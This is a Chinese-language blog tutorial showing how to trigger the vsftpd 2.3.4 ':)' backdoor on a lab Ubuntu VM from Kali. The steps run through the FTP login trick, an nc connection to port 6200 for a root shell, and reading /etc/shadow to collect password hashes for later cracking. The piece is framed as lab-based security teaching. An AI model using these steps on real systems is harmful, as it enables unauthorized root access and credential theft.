<strong>本文僅用於討論網絡安全技術,以保護信息安全為目的,請勿用於非法用途!
Vsftpd 2.3.4
這個版本的FTP服務器軟件,曾經被人動過手腳,所以現在網上流行的這個軟件版本,基本都是自帶<strong>笑臉後門。也就是說,我們可以利用、復現這個笑臉後門漏洞,即可成功獲取目標靶機的shell 權限。
開始觸發笑臉後門
這個版本的FTP服務器,已經安裝在我們的靶機ubuntu中了,開啟ubuntu虛擬機即可。
觸發機制講解:
<strong>我們使用kali終端的ftp客戶端登錄ubuntu的FTP服務端。然後隨意以任何用戶名,後面添加笑臉符號:)和任意密碼登錄,顯然是登陸不成功的,但是程序依然在等待處理響應,此時我們使用nc連接,即可得到一個開放的root權限的shell(系統控制)。
上圖可知ubuntu的ip是192.168.31.164;
Kali終端下開啟ftp客戶端登錄ubuntu
root@kali:~# ftp 192.168.31.164
Connected to 192.168.31.164.
220 (vsFTPd 2.3.4)
Name (192.168.31.164:root): zhang:)
331 Please specify the password.
Password: (後面會有光標跳動)
當我們輸入任意的用戶加笑臉<strong>"zhang:)"登錄,密碼任意,就會看到程序接下來就沒有任何輸出,也就是說處於響應模式。
現在我們使用kali自帶的nc去連接笑臉的後門,端口是6200
重新建打開一個終端,輸入:
nc 192.168.31.164 6200
此時會發現光標在跳動,說明進入shell模式,不信?
<strong>你輸入任何linux命令看看,就能控制ubuntu靶機的shell。
當你輸入"<strong>whoami",就能顯示當前獲得的shell是ubuntu的root用戶!
當你輸入"<strong>ifconfig",就能顯示Ubuntu的網絡!
當你輸入"<strong>cat /etc/shadow
",就能查看ubuntu系統用戶georgia用戶的密碼hash值,我們可以將這個hash保存到kali本地,方便以後進行破解。當你輸入"<strong>cat /proc/version",即可查看對方系統的版本。
更多的,請自己嘗試linux的命令。
到目前為止,我們學會了<strong>Vsftpd FTP2.3.4服務器存在一個<strong>笑臉後門,只要適當的訪問就能觸發這個後門,之後我們使用nc到特定的6200端口即可得到遠程系統的shell,甚至是<strong>root權限,最後你使用更多的linux命令即可遠程控制對方的ubuntu!
kali滲透我想說
獲取更多kali、Web、安卓滲透等hack技術。請關注小白嘿客,私信即可。歡迎在下方評論區留言討論!
閱讀更多 小白嘿客 的文章